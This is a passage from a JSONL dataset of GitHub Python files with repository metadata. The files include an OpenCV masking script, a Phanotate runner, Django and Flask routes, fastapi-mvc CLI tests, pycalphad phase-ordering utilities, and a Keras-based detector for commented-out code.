th(gray_tha)\n\ncv.imwrite(\"Resultados/Thresh_Thanos.png\", thresh_tha)\ncv.imwrite(\"Resultados/Thresh_Universe.png\", thresh_uni)\n\n#######################################################################\ndef mask(image):\n blank = np.zeros(image.shape[:2], dtype = \"uint8\")\n circle = cv.circle(blank, (image.shape[1]//2,image.shape[0]//2),100,255, -1)\n masked = cv.bitwise_and(image,image,mask=circle)\n return(masked)\n\nmasked_uni = mask(img1)\nmasked_Thanos = mask(img2)\ncv.imwrite(\"Resultados/Masked_Uni.png\", masked_uni)\ncv.imwrite(\"Resultados/Masked_Thanos.png\", masked_Thanos)\n\n########################################################################\n\n\n","repo_name":"NestorMartinez13/Taller_3_Python_UPB_2022_1003043733","sub_path":"transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6263588374","text":"#!/usr/bin/env python3\n\"\"\"\nPhanotate runner.\nUsage:\n phanotate_runner.py ( --input_file_list=PATH ) ( --output_dir=PATH )\n ( --out_format=FORMAT ) ( --threads=INT )\n\nOptions:\n -h --help Show this screen.\n -i --input_file_list=PATH Path to a file containing a list of input fasta files.\n -o --output_dir=PATH Path to the output directory.\n -f --out_format=FORMAT Format of the output files choices=['tabular','genbank','fasta'] [default: genbank]\n -t --threads=INT Number of threads to use for running individual anotations [default: 1].\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport logging\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom docopt import docopt\nlogger = logging.getLogger(__name__)\n\n\ndef check_extensions(input_file):\n extensions = ('.fasta', 'fasta.gz', '.fa', '.fa.gz', '.fna', '.fna.gz')\n for ext in extensions:\n if input_file.endswith(ext):\n return ext\n raise ValueError(\"Input file does not have a valid extension: {}\\nValid extensions are: {}\".format(input_file, extensions))\n\ndef run_phanotate(input_file, output_dir, out_format, input_file_extension='', output_file_extension='',):\n \"\"\"\n Run phanotate on a single input file.\n \"\"\"\n out_fname = os.path.join(output_dir, os.path.basename(input_file).replace(input_file_extension, output_file_extension))\n try:\n cmd = [\n 'phanotate.py',\n '-o', out_fname,\n '-f', out_format,\n input_file ]\n logger.info(\"Running phanotate on {}\".format(input_file))\n logger.info(\"Running command: {}\".format(' '.join(cmd)))\n subprocess.run(cmd, check=True)\n except subprocess.CalledProcessError:\n logger.error(\"Error running phanotate on {}\".format(input_file))\n sys.exit(1)\n\ndef main(*args, **kwargs):\n logging.basicConfig(\n level = logging.INFO,\n datefmt=\"%Y-%m-%d %H:%M\",\n format=\"[%(name)s][%(asctime)s][%(levelname)s] %(message)s\",\n handlers=[\n logging.StreamHandler(),\n ]\n )\n logger.info(\"Arguments: {}\".format(kwargs))\n\n assert int(kwargs['--threads']) > 0, \"Number of threads must be greater than 0\"\n\n kwargs['--output_dir'] = os.path.abspath(kwargs['--output_dir'])\n assert os.path.isdir(kwargs['--output_dir']), \"Output directory does not exist: {}\".format(kwargs['--output_dir'])\n\n file_extensions = {'tabular': '.tsv', 'genbank': '.gbk', 'fasta': '.fna'}\n assert kwargs['--out_format'] in file_extensions.keys(), \"Output format must be one of: {}\".format(file_extensions.keys())\n\n with open(kwargs['--input_file_list'], 'r') as f:\n input_files = f.read().splitlines()\n\n for input_file in input_files:\n assert os.path.exists(input_file), \"Input file does not exist: {}\".format(input_file)\n\n logger.info(\"Running phanotate on {} files\".format(len(input_files)))\n\n logger.info(\"Starting phanotate annotations with {} threads\".format(kwargs['--threads']))\n with Pool(int(kwargs['--threads'])) as p:\n p.map(\n partial(\n run_phanotate,\n output_dir=kwargs['--output_dir'],\n out_format=kwargs['--out_format'],\n input_file_extension=check_extensions(input_files[0]),\n output_file_extension=file_extensions[kwargs['--out_format']],\n ),\n input_files)\n\n logger.info(\"FINISHED !\")\n\nif __name__ == '__main__':\n main(**docopt(__doc__))\n","repo_name":"pangenome/phage-evo-paper","sub_path":"workflow/scripts/phanotate_runner.py","file_name":"phanotate_runner.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"26288370638","text":"from collections import Counter\n\nf = open(\"msgs.txt\",\"r\")\nmsgs=[]\nfor msg in f.readlines():\n\tmsgs.append(msg[-5:-1])\n\ncntrs = Counter(msgs)\nfreqs = Counter(cntrs.values())\n\nfor cntr in cntrs:\n\tprint(cntr, cntrs[cntr])\nprint(freqs, \"sum:\", sum(cntrs.values()))\n","repo_name":"amjadmajid/Backscatter-Network","sub_path":"sniffer/frame_stats.py","file_name":"frame_stats.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"40390332495","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"ShopHome\"),\n path(\"contact_us/\", views.contact_us, name=\"Contact us\"),\n path(\"about_us/\", views.about_us, name=\"about_us\"),\n path(\"tracker/\", views.tracker, name=\"tracker\"),\n path(\"prod_view/\", views.prod_view, name=\"prod_view\"),\n path(\"search/\", views.search, name=\"search\"),\n path(\"checkout/\", views.checkout, name=\"checkout\"),\n path(\"handlerequest/\", views.handlerequest, name=\"HandleRequest\"),\n]\n","repo_name":"Fahad-CSE16/EcommerseWeb","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37183128943","text":"import copy\nfrom unittest import mock\n\nimport pytest\nfrom copier.errors import UserMessageError\nfrom fastapi_mvc.cli.update import update\nfrom fastapi_mvc.constants import ANSWERS_FILE, COPIER_PROJECT\n\n\nclass TestCliUpdateCommand:\n\n @pytest.fixture\n def patched_update(self):\n cmd = copy.deepcopy(update)\n copier_patch = mock.patch(\n \"fastapi_mvc.cli.update.copier\",\n )\n cmd.copier = copier_patch.start()\n yield cmd\n copier_patch.stop()\n del cmd\n\n def test_should_exit_zero_when_invoked_with_help(self, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(update, [\"--help\"])\n\n # then\n assert result.exit_code == 0\n\n def test_should_exit_error_when_invoked_with_invalid_option(self, cli_runner):\n # given / when\n result = cli_runner.invoke(update, [\"--not_exists\"])\n\n # then\n assert result.exit_code == 2\n\n def test_should_exit_zero_and_call_copier_with_defaults(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 0\n patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=COPIER_PROJECT.vcs_ref,\n answers_file=ANSWERS_FILE,\n user_defaults={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n pretend=False\n )\n\n def test_should_exit_zero_and_call_copier_with_parsed_arguments(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(\n patched_update, [\n \"--no-interaction\",\n \"--pretend\",\n \"--use-version\",\n \"master\",\n ],\n )\n\n # then\n assert result.exit_code == 0\n patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=\"master\",\n answers_file=ANSWERS_FILE,\n data={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n overwrite=True,\n pretend=True,\n )\n\n def test_should_exit_error_when_not_in_fastapi_mvc_project(self, cli_runner, caplog):\n # given / when\n result = cli_runner.invoke(update, [])\n\n # then\n assert result.exit_code == 1\n msg = \"Not a fastapi-mvc project. Try 'fastapi-mvc new --help' for details how to create one.\"\n assert msg in caplog.text\n\n def test_should_exit_error_on_copier_error(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n patched_update.copier.run_update.side_effect = UserMessageError(\"Fake error\")\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 2\n assert \"Fake error\" in result.output\n patched_update.copier.run_update.assert_called_once()\n","repo_name":"fastapi-mvc/fastapi-mvc","sub_path":"tests/unit/cli/test_update.py","file_name":"test_update.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"}
+{"seq_id":"12352042811","text":"\"\"\"\nUtilities for distinguishing and renaming ordered and disordered configurations of\nmulti-sublattice phases.\n\n`OrderingRecord` objects are able to be used for any phase. `OrderingRecords` can be\ncreated automatically for phases modeled with a partitioned order/disorder model through\nthe `create_ordering_records` method, since the partitioned model contains all the\ninformation about the ordered and disordered phase.\n\"\"\"\n\nfrom dataclasses import dataclass\nfrom typing import Sequence, List\nimport itertools\nfrom collections import defaultdict\nimport numpy as np\nimport xarray as xr\nfrom pycalphad.core.utils import unpack_components\n\n@dataclass\nclass OrderingRecord:\n ordered_phase_name: str\n disordered_phase_name: str\n subl_dof: Sequence[int] # number of degrees of freedom in each sublattice of the ordered phase\n symmetric_subl_idx: Sequence[Sequence[int]] # List of sublattices (of the ordered phase) that are symmetric\n\n def is_disordered(self, site_fractions):\n # Short circuit if any site fraction is NaN (i.e. no phase or a different phase)\n if np.any(np.isnan(site_fractions[:sum(self.subl_dof)])):\n return False\n\n # For each sublattice, create a `slice` object for slicing the site\n # fractions of that particular sublattice from the site fraction array\n subl_slices = []\n for subl_idx in range(len(self.subl_dof)):\n start_idx = np.sum(self.subl_dof[:subl_idx], dtype=np.int_)\n end_idx = start_idx + self.subl_dof[subl_idx]\n subl_slices.append(slice(start_idx, end_idx))\n\n # For each set of symmetrically equivalent sublattices\n for symm_subl in self.symmetric_subl_idx:\n # Check whether the site fractions of each pair of symmetrically\n # equivalent sublattices are ordered or disordered\n for idx1, idx2 in itertools.combinations(symm_subl, 2):\n # A phase is ordered if any pair of sublattices does not have\n # equal (within numerical tolerance) site fractions\n pair_is_ordered = np.any(~np.isclose(site_fractions[subl_slices[idx1]], site_fractions[subl_slices[idx2]]))\n if pair_is_ordered:\n return False\n return True\n\n\ndef create_ordering_records(dbf, comps, phases):\n \"\"\"Return a dictionary with the sublattice degrees of freedom and equivalent\n sublattices for order/disorder phases\n\n Parameters\n ----------\n dbf : pycalphad.Database\n comps : list[str]\n List of active components to consider\n phases : list[str]\n List of active phases to consider\n\n Returns\n -------\n List[OrderingRecord]\n\n Notes\n -----\n Phases which should be checked for ordered/disordered configurations are\n determined heuristically for this script.\n\n The heuristic for a phase satisfies the following:\n 1. The phase is the ordered part of an order-disorder model\n 2. The equivalent sublattices have all the same number of elements\n \"\"\"\n species = unpack_components(dbf, comps)\n ordering_records = []\n for phase_name in phases:\n phase_obj = dbf.phases[phase_name]\n if phase_name == phase_obj.model_hints.get('ordered_phase', ''):\n # This phase is active and modeled with an order/disorder model.\n dof = [len(subl.intersection(species)) for subl in phase_obj.constituents]\n # Define the symmetrically equivalent sublattices as any sublattices\n # TODO: the heuristic here is simple and incorrect for cases like L1_2.\n # that have the same site ratio. Create a {site_ratio: [subl idx]} dict\n site_ratio_idxs = defaultdict(lambda: [])\n for subl_idx, site_ratio in enumerate(phase_obj.sublattices):\n site_ratio_idxs[site_ratio].append(subl_idx)\n equiv_sublattices = list(site_ratio_idxs.values())\n ordering_records.append(OrderingRecord(phase_name, phase_obj.model_hints['disordered_phase'], dof, equiv_sublattices))\n return ordering_records\n\n\ndef rename_disordered_phases(eq_result, ordering_records):\n \"\"\"\n Modify an xarray Dataset to rename the ordered phase names to the disordered phase\n names if the equilibrium configuration is disordered\n\n Parameters\n ----------\n eq_result : xarray.Dataset\n order_disorder_dict : OrderingRecord\n Output from scheil.utils.order_disorder_dict\n\n Returns\n -------\n xrray.Dataset\n Dataset modified in-place\n\n Notes\n -----\n This function does _not_ change the site fractions array of the disordered\n configurations to match the site fractions matching the internal degrees of freedom\n of the disordered phase's constituents (although that should be possible).\n\n Examples\n --------\n >>> from pycalphad import Database, equilibrium, variables as v\n >>> import pycalphad.tests.databases\n >>> from importlib_resources import files\n >>> dbf = Database(str(files(pycalphad.tests.databases).joinpath(\"alcfe_b2.tdb\")))\n >>> comps = ['AL', 'FE', 'VA']\n >>> phases = list(dbf.phases.keys())\n >>> eq_res = equilibrium(dbf, comps, ['B2_BCC'], {v.P: 101325, v.T: 1000, v.N: 1, v.X('AL'): [0.1, 0.4]})\n >>> ordering_records = create_ordering_records(dbf, comps, phases)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['B2_BCC', '', ''], ['B2_BCC', '', '']]\n >>> out_result = rename_disordered_phases(eq_res, ordering_records)\n >>> eq_res.Phase.values.squeeze().tolist()\n [['A2_BCC', '', ''], ['B2_BCC', '', '']]\n \"\"\"\n\n for ord_rec in ordering_records:\n # Array indices matching phase with ordered phase name\n mask = eq_result.Phase == ord_rec.ordered_phase_name\n # disordered_mask is a boolean mask that is True if the element listed as an\n # ordered phase is a disordered configuration. We want to broadcast over all\n # dimensions except for internal_dof (we need all internal dof to determine if\n # the site fractions are disordered). The `OrderingRecord.is_disordered` method\n # is not vectorized (operates on 1D site fractions), so we use `vectorize=True`.\n disordered_mask = xr.apply_ufunc(ord_rec.is_disordered, eq_result.where(mask).Y, input_core_dims=[['internal_dof']], vectorize=True)\n # Finally, use `xr.where` to set the value of the phase name to the disordered\n # phase everywhere the mask is true and use the existing value otherwise\n eq_result['Phase'] = xr.where(disordered_mask, ord_rec.disordered_phase_name, eq_result.Phase)\n return eq_result","repo_name":"pycalphad/scheil","sub_path":"scheil/ordering.py","file_name":"ordering.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"}
+{"seq_id":"11045727745","text":"from http import HTTPStatus\nfrom flask import (\n Blueprint,\n request\n)\nfrom marshmallow import ValidationError\nimport pydash as py_\nfrom pymongo.errors import DuplicateKeyError\nfrom flask_jwt_extended import jwt_required, current_user\nimport src.constants as Consts\nimport src.schemas.student as SchemaStudent\nimport src.controllers as Controller\n\n\nbp = Blueprint('student', __name__, url_prefix='/api/student')\n\n\n@bp.route('', methods=['POST'])\n@jwt_required()\ndef add_student():\n user_id=py_.get(current_user, '_id')\n payload = request.get_json()\n args = request.args\n class_id = py_.get(args, 'class', None)\n try:\n student_id = Controller.Student.insert_student(user_id,class_id, payload)\n except ValidationError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": {\"id\":student_id},\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('', methods=['GET'])\n@jwt_required()\ndef get_student():\n user_id=py_.get(current_user, '_id')\n args = request.args\n page = py_.to_integer(py_.get(args, 'page', 1))\n page_size = py_.to_integer(py_.get(args, 'page_size', Consts.PAGE_SIZE_MAX))\n try:\n return_data = Controller.Student.list_students(user_id,page,page_size)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_oid(id):\n try:\n return_data = Controller.Student.one_student(id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }\n\n@bp.route('id/', methods=['GET'])\n@jwt_required()\ndef get_one_student_by_id(id):\n user_id = py_.get(current_user, '_id')\n try:\n return_data = Controller.Student.one_student_id(id,user_id)\n except ValueError as e:\n return {\n \"status\": HTTPStatus.BAD_REQUEST,\n \"data\": {},\n \"msg\": str(e)\n }\n return {\n \"status\": HTTPStatus.OK,\n \"data\": return_data,\n \"msg\": Consts.MESSAGE_SUCCESS\n }","repo_name":"bezleen/attendance-app-backend","sub_path":"src/api/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31562551421","text":"# -*- coding:UTF-8 -*-\n\"\"\"\n@Description Find commented-out code in python scripts.\n@Author Zhang YT\n@Date 2020/10/23 14:38\n\"\"\"\nimport os\nfrom tokenize import tokenize, TokenError\nfrom ast import parse\nfrom json import dump\nfrom argparse import ArgumentParser\nfrom numpy import asarray, squeeze\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import sequence\nfrom time import process_time\nfrom functools import wraps\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 忽略警告信息,不加这一句警告贼多\n\n\ndef timethis(func):\n \"\"\"计时函数装饰器\"\"\"\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = process_time()\n r = func(*args, **kwargs)\n end = process_time()\n print('{} executing time: {}s'.format(func.__name__, end - start))\n return r\n return wrapper\n\n\ndef create_generator(data):\n \"\"\"字符流生成器,在内部构建了一个闭包。\n 为了节约内存,避免一次性加载文件内容\"\"\"\n\n def generator():\n for elem in data:\n try:\n yield str.encode(elem)\n except:\n yield str.encode('')\n\n g = generator() # 生成器\n\n def next_element():\n return next(g)\n\n return next_element # 迭代器\n\n\nclass Classifier(object):\n def __init__(self,\n root_path, # 指定扫描目录,或者文件\n model_character_path, # (可选)训练好的character模型\n model_token_path, # (可选)训练好的 token模型\n vocab_path, # (可选)token模型使用的词表文件\n outfile, # (可选)输出结果的目录\n keyword=\"vocabs/vocab_keywords.txt\"\n ):\n self.root_path = root_path\n self.model_character_path = model_character_path\n self.model_token_path = model_token_path\n self.vocab_path = vocab_path\n self.outfile = outfile\n self.load_model() # 载入模型文件\n self.init_character_dict() # 初始化character模型所必需的词表\n self.init_token_dict(self.vocab_path) # 初始化token模型所必需的词表\n self.init_adjacent_dict(keyword) # 初始化python保留字表\n\n def load_model(self):\n self.lstm_model_character = load_model(self.model_character_path)\n self.lstm_model_token = load_model(self.model_token_path)\n\n def init_character_dict(self):\n \"\"\"初始化character模型所必需的词表\"\"\"\n # 所有可见字符将其映射为唯一的整数\n alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()` ,./<>?;':\\\"[]{}=-+_\\t\\r\\n|\\\\\"\n self.char_to_int = dict((c, i + 2) for i, c in enumerate(alphabet))\n self.char_to_int[''] = 0\n self.char_to_int[''] = 1\n self.int_to_char = dict((i, c) for c, i in self.char_to_int.items())\n\n def init_token_dict(self, vocab_path):\n \"\"\"初始化token模型所必需的词表\"\"\"\n # 从词表目录读取词表文件\n vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n vocab.append(line.rstrip('\\n'))\n self.token_2_id = {row: index + 8 for index, row in enumerate(vocab)}\n self.token_2_id[''] = 0\n self.token_2_id[''] = 1\n self.token_2_id[''] = 2\n self.token_2_id[''] = 3\n self.token_2_id[''] = 4\n self.token_2_id[''] = 5\n self.token_2_id[''] = 6\n self.token_2_id[''] = 7\n self.id_2_token = {v: k for k, v in self.token_2_id.items()}\n\n def init_adjacent_dict(self, vocab_path):\n \"\"\"初始化python保留字表\"\"\"\n # 从词表目录读取词表文件\n self.id_vocab = []\n with open(vocab_path, 'r', encoding='utf8') as f:\n for line in f:\n self.id_vocab.append(line.rstrip('\\n'))\n\n @staticmethod\n def get_pyfile_path(root_path):\n \"\"\"获取指定目录及其子目录下所有的py文件的目录\"\"\"\n pyfiles = []\n root_path = os.path.abspath(root_path)\n for file_path, _, files in os.walk(root_path):\n for file in files:\n if file.endswith('.py'):\n pyfiles.append(os.path.join(file_path, file))\n return pyfiles\n\n @staticmethod\n def read_txtfile(filename):\n \"\"\"读取指定path对应的py文件的文本\"\"\"\n sharps = []\n try:\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n sharps.append(line.strip('\\n'))\n except UnicodeDecodeError:\n pass\n return sharps\n\n def gather_sharp_data(self, pyfiles):\n \"\"\"读取指定path对应的py文件的文本,并提取其#开头的所有行\"\"\"\n sharp_data = []\n for pyfile in pyfiles:\n pycontent = self.read_txtfile(pyfile)\n for lineno, line in enumerate(pycontent):\n if line.lstrip().startswith('#'):\n dic = {\n 'file': pyfile,\n 'line': lineno + 1,\n 'highlighted_element': line.lstrip(' #').rstrip()\n }\n sharp_data.append(dic)\n return sharp_data\n\n def from_text_to_character_input(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n for row in text:\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_character_input_and_index(self, text, threshold=3, maxlen=70):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n\n def check_dict(word):\n if word in self.char_to_int.keys():\n return self.char_to_int.get(word)\n return self.char_to_int.get('')\n\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n char_array = asarray(list(row), dtype=str)\n int_array = asarray(list(map(check_dict, char_array)))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n indexes.append(index)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n def from_text_to_token_id(self, row):\n \"\"\"把一行代码转成token\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n tokens = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n if toknum == 1:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 2:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 3:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 53:\n tokens.append(\n self.token_2_id.get(tokval)) if tokval in self.token_2_id.keys() else tokens.append(\n self.token_2_id.get(''))\n elif toknum == 56:\n tokens.append(self.token_2_id.get(''))\n elif toknum == 57:\n tokens.append(self.token_2_id.get(''))\n except TokenError:\n pass # 遍历到末尾会raise error\n return tokens\n\n def check_adjacent_id(self, row):\n \"\"\"检查有没有相邻的两个id\"\"\"\n data_generator = create_generator([row])\n tokens_iterator = tokenize(data_generator)\n res = []\n try:\n for toknum, tokval, _, _, _ in tokens_iterator:\n res.append((toknum, tokval))\n except TokenError:\n pass\n # 检查有没有相邻的两个id,有的话则不是code\n for i in range(len(res) - 1):\n if res[i][0] == 1 \\\n and res[i + 1][0] == 1 \\\n and res[i][1] not in self.id_vocab \\\n and res[i + 1][1] not in self.id_vocab:\n return True\n return False\n\n def from_text_to_token_input(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n for row in text:\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen)\n\n def from_text_to_token_input_and_index(self, text, threshold=3, maxlen=30):\n \"\"\"输入[line],输出适合直接学习的[input]与对应的[index]。\n threshold目的是筛选那些长度过短的line\n maxlen是对齐[input]长度,方便模型输入\n 加index是为了能够溯源,防止index被打乱\"\"\"\n inputs = []\n indexes = []\n for index, row in enumerate(text):\n # 筛选那些相邻的id,2代表单词表外的id\n if self.check_adjacent_id(row):\n continue\n int_array = asarray(self.from_text_to_token_id(row))\n if len(int_array) >= threshold:\n indexes.append(index)\n inputs.append(int_array)\n return sequence.pad_sequences(asarray(inputs), padding='post', value=0, maxlen=maxlen), indexes\n\n @staticmethod\n def reduce_sharp_by_rule(tuple_list):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出符合规则的[{file,line,highlighted_element}]\"\"\"\n reduced_set = [] # 还需进一步判断的行\n code_set = [] # 不需进一步判断的行\n for item in tuple_list:\n try:\n text_line = item['highlighted_element']\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and text_line.rstrip(',').endswith(')') \\\n or text_line.startswith('[') and text_line.rstrip(',').endswith(']'):\n # 出现这种特征,是代码的可能性大,需要经过一遍编译\n # 通过编译则为代码,不通过则录入reduced_set\n parse(text_line) # 尝试编译\n code_set.append(item)\n continue\n elif text_line.startswith(\"if __name__ ==\"):\n # 出现这种特征,肯定是代码\n code_set.append(item)\n continue\n reduced_set.append(item)\n except:\n reduced_set.append(item) # 不通过说明from语句没通过编译\n return reduced_set, code_set\n\n @timethis\n def classify(self):\n \"\"\"输入全部[{file,line,highlighted_element}],\n 输出被怀疑为代码的[{file,line,highlighted_element}]\"\"\"\n # 获得数据\n if self.root_path.endswith('.py'):\n path = os.path.abspath(self.root_path)\n tuple_list = self.gather_sharp_data([path])\n else:\n tuple_list = self.gather_sharp_data(self.get_pyfile_path(self.root_path))\n print(f\"All testing comment number from {self.root_path}: {len(tuple_list)}.\")\n\n # 依照确定性算法,将注释分为需要进一步判断的tuple_list和code_list\n tuple_list, code_list = self.reduce_sharp_by_rule(tuple_list)\n # 防止模型输入为空\n if len(tuple_list) <= 0:\n print(\"1: No commented-out code.\")\n # 保存结果\n self.dump_res(code_list)\n return # 没发现值得进一步分析的行,提前结束\n else:\n print(\"Commented code number find by pure grammar checker: \", len(code_list))\n\n # 然后切分成token再输入token模型\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_token_input_and_index(sharps)\n predict_label = (self.lstm_model_token.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_token = []\n mask = [squeeze(predict_label) == 0] # code\n for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_token.append(tuple_list[lineno])\n print(\"Commented code number find by `token` model: \", len(code_item_token))\n\n # 最后使用character模型逐字符判断\n sharps = [x.get('highlighted_element') for x in tuple_list]\n sharp_inputs, sharp_inputs_index = self.from_text_to_character_input_and_index(sharps)\n predict_label = (self.lstm_model_character.predict(sharp_inputs) > 0.5).astype(\"int32\")\n code_item_char = []\n mask = [squeeze(predict_label) == 0] # code\n for lineno in asarray(sharp_inputs_index)[tuple(mask)]:\n code_item_char.append(tuple_list[lineno])\n print(\"Commented code number find by `character` model: \", len(code_item_char))\n\n code_list.extend(code_item_char)\n # 两个集合取并集\n for item in code_item_token:\n for item2 in code_item_char:\n if item.get('highlighted_element') == item2.get('highlighted_element') \\\n and item.get('line') == item2.get('line') \\\n and item.get('file') == item2.get('file'):\n break\n else:\n code_list.append(item)\n print(\"Total number of commented code: .\", len(code_list))\n # 保存结果\n self.dump_res(code_list)\n\n def contains_code(self, lines):\n waiting_line_index = []\n code_line_index = set()\n for index, text_line in enumerate(lines):\n try:\n if len(text_line.strip('=\\'\\\"')) <= 1 \\\n or text_line == \"coding=utf-8\" \\\n or text_line[0].isupper() and text_line.endswith('.') \\\n or not text_line.isascii(): # TODO 在这里判断太早,应该在\n # 出现这种特征,代表着绝不可能是代码\n continue\n elif text_line.startswith(\"from \") or text_line.startswith(\"import \") \\\n or text_line.startswith(\"self.\") or \" = \" in text_line \\\n or text_line.startswith('(') and 